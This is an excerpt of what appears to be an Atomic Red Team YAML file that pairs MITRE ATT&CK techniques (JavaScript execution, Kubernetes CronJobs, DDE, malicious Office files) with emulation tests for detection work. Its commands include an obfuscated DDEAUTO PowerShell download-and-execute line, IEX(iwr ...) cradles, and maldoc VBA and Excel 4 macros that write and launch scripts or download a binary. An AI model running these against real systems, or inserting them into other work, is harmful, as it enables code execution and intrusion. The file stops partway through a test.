default: PathToAtomicsFolder\..\ExternalPayloads\pscp.exe
vib_install:
description: Path to script with commands to install the vib
type: path
default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibinstall.txt
vib_remove:
description: Path to script with commands to remove the vib
type: path
default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibremove.txt
vib_file:
description: Path to the dummy vib
type: path
default: PathToAtomicsFolder\..\atomics\T1129\src\atomicvibes.vib
dependency_executor_name: powershell
dependencies:
- description: 'Check if plink and pscp are available.
'
prereq_command: |
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
if (Test-Path "#{pscp_file}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\plink.exe"
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
executor:
command: |
#{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"
cleanup_command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}"
-pw "#{vm_pass}" -m "#{vib_remove}"
'
name: command_prompt
elevation_required: false
T1059.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
created: '2020-06-23T19:12:24.924Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/007
external_id: T1059.007
- source_name: Apple About Mac Scripting 2016
description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
14, 2021.
url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- source_name: MDSec macOS JXA and VSCode
description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
with VSCode Extensions. Retrieved April 20, 2021.
url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- source_name: Microsoft JScript 2007
description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
ECMAScript …. Retrieved June 23, 2020.
url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- source_name: Microsoft Windows Scripts
description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
June 23, 2020.
url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- source_name: JScrip May 2018
description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
June 23, 2020.
url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- source_name: NodeJS
description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
url: https://nodejs.org/
- source_name: SentinelOne macOS Red Team
description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
APIs Without Building Binaries. Retrieved July 17, 2020.'
url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- source_name: SpecterOps JXA 2020
description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
2021.
url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- source_name: Red Canary Silver Sparrow Feb2021
description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
wings: Outing macOS malware before it takes flight. Retrieved April 20,
2021.'
url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:24.217Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Cody Thomas, SpecterOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '2.2'
x_mitre_remote_support: false
identifier: T1059.007
atomic_tests:
- name: JScript execution to gather local computer information via cscript
auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035
description: JScript execution test, execute JScript via cscript command. When
successful, system information will be written to $env:TEMP\T1059.007.out.txt
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: 'if (Test-Path "#{jscript}") {exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path "#{jscript}") -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: 'cscript "#{jscript}" > %tmp%\T1059.007.out.txt
'
cleanup_command: del %tmp%\T1059.007.out.txt >nul 2>&1
name: command_prompt
- name: JScript execution to gather local computer information via wscript
auto_generated_guid: '0709945e-4fec-4c49-9faf-c3c292a74484'
description: JScript execution test, execute JScript via wscript command. When
successful, system information will be shown with four message boxes.
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: 'if (Test-Path "#{jscript}") {exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path "#{jscript}") -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: 'wscript "#{jscript}"
'
name: command_prompt
T1053.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096
created: '2021-03-29T17:06:22.247Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/007
external_id: T1053.007
- source_name: Kubernetes CronJob
description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved
March 29, 2021.
url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
- source_name: Kubernetes Jobs
description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March
30, 2021.
url: https://kubernetes.io/docs/concepts/workloads/controllers/job/
- source_name: Threat Matrix for Kubernetes
description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved
March 30, 2021.
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.363Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Center for Threat-Informed Defense (CTID)
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.4'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
description: 'Kubernetes Job is a controller that creates one or more pods and
ensures that a specified number of them successfully terminate. Kubernetes
Job can be used to run containers that perform finite tasks for batch jobs.
Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
'
supported_platforms:
- containers
input_arguments:
namespace:
description: K8s namespace to list
type: string
default: default
dependencies:
- description: 'kubectl must be installed
'
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
command: 'kubectl get cronjobs -n #{namespace}
'
name: bash
elevation_required: false
- name: CreateCronjob
auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
description: 'Kubernetes Job is a controller that creates one or more pods and
ensures that a specified number of them successfully terminate. Kubernetes
Job can be used to run containers that perform finite tasks for batch jobs.
Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
'
supported_platforms:
- containers
input_arguments:
namespace:
description: K8s namespace to list
type: string
default: default
dependencies:
- description: 'kubectl must be installed
'
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
'
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
'
name: bash
elevation_required: false
T1559.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d
created: '2020-02-12T14:10:50.699Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1559/002
external_id: T1559.002
- source_name: OWASP CSV Injection
description: " Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February
7, 2022."
url: https://owasp.org/www-community/attacks/CSV_Injection
- source_name: 'CSV Excel Macro Injection '
description: " Ishaq Mohammed . (2021, January 10). Everything about CSV Injection
and CSV Excel Macro Injection. Retrieved February 7, 2022."
url: https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/
- source_name: BleepingComputer DDE Disabled in Word Dec 2017
description: Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature
in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.
url: https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/
- source_name: SensePost PS DDE May 2016
description: El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The
Power Within. Retrieved November 22, 2017.
url: https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
- source_name: Fireeye Hunting COM June 2019
description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
10, 2019.
url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- source_name: Kettle CSV DDE Aug 2014
description: Kettle, J. (2014, August 29). Comma Separated Vulnerabilities.
Retrieved November 22, 2017.
url: https://www.contextis.com/blog/comma-separated-vulnerabilities
- source_name: Microsoft ADV170021 Dec 2017
description: Microsoft. (2017, December 12). ADV170021 - Microsoft Office
Defense in Depth Update. Retrieved February 3, 2018.
url: https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021
- source_name: Microsoft DDE Advisory Nov 2017
description: Microsoft. (2017, November 8). Microsoft Security Advisory 4053440
- Securely opening Microsoft Office documents that contain Dynamic Data
Exchange (DDE) fields. Retrieved November 21, 2017.
url: https://technet.microsoft.com/library/security/4053440
- source_name: Enigma Reviving DDE Jan 2018
description: 'Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and
Excel for Code Execution. Retrieved February 3, 2018.'
url: https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
- source_name: NVisio Labs DDE Detection Oct 2017
description: NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents.
Retrieved November 21, 2017.
url: https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/
- source_name: SensePost MacroLess DDE Oct 2017
description: Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code
Exec in MSWord. Retrieved November 21, 2017.
url: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:31.581Z'
name: 'Inter-Process Communication: Dynamic Data Exchange'
description: |-
Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )
DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1559.002
atomic_tests:
- name: Execute Commands
auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
description: 'Executes commands via DDE using Microsfot Word
'
supported_platforms:
- windows
executor:
steps: |
Open Microsoft Word
Insert tab -> Quick Parts -> Field
Choose = (Formula) and click ok.
After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.
The Field Code should now be displayed, change it to Contain the following:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
name: manual
- name: Execute PowerShell script via Word DDE
auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
description: 'When the word document opens it will prompt the user to click
ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
and execute a powershell script
'
supported_platforms:
- windows
executor:
command: 'start "$PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx"
'
name: command_prompt
- name: DDEAUTO
auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
description: |2
TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
Word VBA Macro
[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
supported_platforms:
- windows
executor:
steps: |
1. Open Word
2. Insert tab -> Quick Parts -> Field
3. Choose = (Formula) and click ok.
4. Once the field is inserted, you should now see "!Unexpected End of Formula"
5. Right-click the Field, choose "Toggle Field Codes"
6. Paste in the code from Unicorn or SensePost
7. Save the Word document.
9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # " "Microsoft Document Security Add-On"
name: manual
T1204.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e
created: '2020-03-11T14:49:36.954Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1204/002
external_id: T1204.002
- source_name: Password Protected Word Docs
description: 'Lawrence Abrams. (2017, July 12). PSA: Don''t Open SPAM Containing
Password Protected Word Docs. Retrieved January 5, 2022.'
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
- source_name: Mandiant Trojanized Windows 10
description: Mandiant Intelligence. (2022, December 15). Trojanized Windows
10 Operating System Installers Targeted Ukrainian Government. Retrieved
September 26, 2025.
url: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:31.674Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg,
and .iso.(Citation: Mandiant Trojanized Windows 10)\n\nAdversaries may employ
various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
and/or password protecting the file and supplying instructions to a user on
how to open it.(Citation: Password Protected Word Docs) \n\nWhile [Malicious
File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly
after Initial Access it may occur at other phases of an intrusion, such as
when an adversary places a file in a shared directory or on a user's desktop
hoping that a user will click on it. This activity may also be seen shortly
after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- TruKno
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.6'
x_mitre_remote_support: false
identifier: T1204.002
atomic_tests:
- name: OSTap Style Macro Execution
auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff
description: |
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
- windows
input_arguments:
jse_path:
description: 'Path for the macro to write out the "malicious" .jse file
'
type: string
default: C:\Users\Public\art.jse
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
'
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
description: 'Uses cscript //E:jscript to download a file
'
supported_platforms:
- windows
input_arguments:
script_file:
description: File to execute jscript code from
type: path
default: "%TEMP%\\OSTapGet.js"
file_url:
description: URL to retrieve file from
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
executor:
command: |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile('ostapout.txt', 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
name: command_prompt
- name: Maldoc choice flags command execution
auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
description: |
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
description: |
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
jse_path:
description: jse file to execute with wscript
type: path
default: C:\Users\Public\art.jse
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: Office launching .bat file from AppData
auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
description: Microsoft Office creating then launching a .bat script from an
AppData directory. The .bat file launches calc.exe when opened.
supported_platforms:
- windows
input_arguments:
bat_path:
description: Path to malicious .bat file
type: string
default: $("$env:temp\art1204.bat")
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
cleanup_command: |
Remove-Item #{bat_path} -ErrorAction Ignore
Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
name: powershell
- name: Excel 4 Macro
auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username
supported_platforms:
- windows
input_arguments:
download_url:
description: Download URL
type: string
default: https://live.sysinternals.com/procexp.exe
uname:
description: Username for pathing
type: string
default: "$env:Username"
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Excel must be installed
'
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
'
executor:
command: |
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
